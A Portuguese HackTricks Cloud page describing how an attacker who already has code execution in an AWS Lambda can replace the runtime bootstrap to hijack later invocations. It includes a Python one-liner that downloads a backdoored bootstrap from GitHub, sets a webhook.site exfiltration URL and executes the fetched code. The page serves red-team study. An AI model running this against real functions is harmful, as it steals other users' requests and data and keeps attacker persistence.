AWS - Steal Lambda Requests

Aprenda e pratique AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo no Discord ou ao grupo no Telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios no github.

Fluxo Lambda

Slicer é um processo fora do contêiner que envia invocações para o processo init.
O processo init escuta na porta 9001 expondo alguns endpoints interessantes:

/2018-06-01/runtime/invocation/next – obter o próximo evento de invocação
/2018-06-01/runtime/invocation/{invoke-id}/response – retornar a resposta do handler para a invocação
/2018-06-01/runtime/invocation/{invoke-id}/error – retornar um erro de execução

bootstrap.py tem um loop obtendo invocações do processo init e chama o código do usuário para tratá-las (/next).
Finalmente, bootstrap.py envia para o init a resposta

Note que o bootstrap carrega o código do usuário como um módulo, então qualquer execução de código realizada pelo código do usuário está realmente acontecendo neste processo.

Roubando Requisições Lambda

O objetivo deste ataque é fazer com que o código do usuário execute um processo bootstrap.py malicioso dentro do processo bootstrap.py que lida com a requisição vulnerável. Desta forma, o processo bootstrap malicioso começará a conversar com o processo init para lidar com as requisições enquanto o bootstrap legítimo está preso executando o malicioso, então ele não pedirá requisições ao processo init.

Esta é uma tarefa simples de realizar, pois o código do usuário está sendo executado pelo processo bootstrap.py legítimo. Então o atacante poderia:

Enviar um resultado falso da invocação atual para o processo init, para que o init pense que o processo bootstrap está esperando por mais invocações.
Uma requisição deve ser enviada para /${invoke-id}/response
O invoke-id pode ser obtido da pilha do processo bootstrap.py legítimo usando o módulo python inspect (como proposto aqui) ou apenas solicitando-o novamente para /2018-06-01/runtime/invocation/next (como proposto aqui).
Executar um boostrap.py malicioso que lidará com as próximas invocações
Para fins de furtividade, é possível enviar os parâmetros de invocações lambda para um C2 controlado pelo atacante e então lidar com as requisições como de costume.
Para este ataque, é suficiente obter o código original de bootstrap.py do sistema ou github, adicionar o código malicioso e executá-lo a partir da invocação lambda atual.

Passos do Ataque

Encontrar uma vulnerabilidade RCE.
Gerar um bootstrap malicioso (e.g. https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)
Executar o bootstrap malicioso.

Você pode facilmente realizar essas ações executando:

python3 <<EOF
import os
import urllib3

# Download backdoored bootstrap
http = urllib3.PoolManager()
backdoored_bootstrap_url = "https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py"
new_runtime = http.request('GET', backdoored_bootstrap_url).data

# Load new bootstrap
os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402a7c0"

exec(new_runtime)
EOF

Para mais informações, confira https://github.com/carlospolop/lambda_bootstrap_switcher

Referências

https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/

Aprenda e pratique AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Suporte HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo no Discord ou ao grupo no Telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.

PreviousAWS - Lambda Post Exploitation NextAWS - Lightsail Post Exploitation

Last updated 1 month ago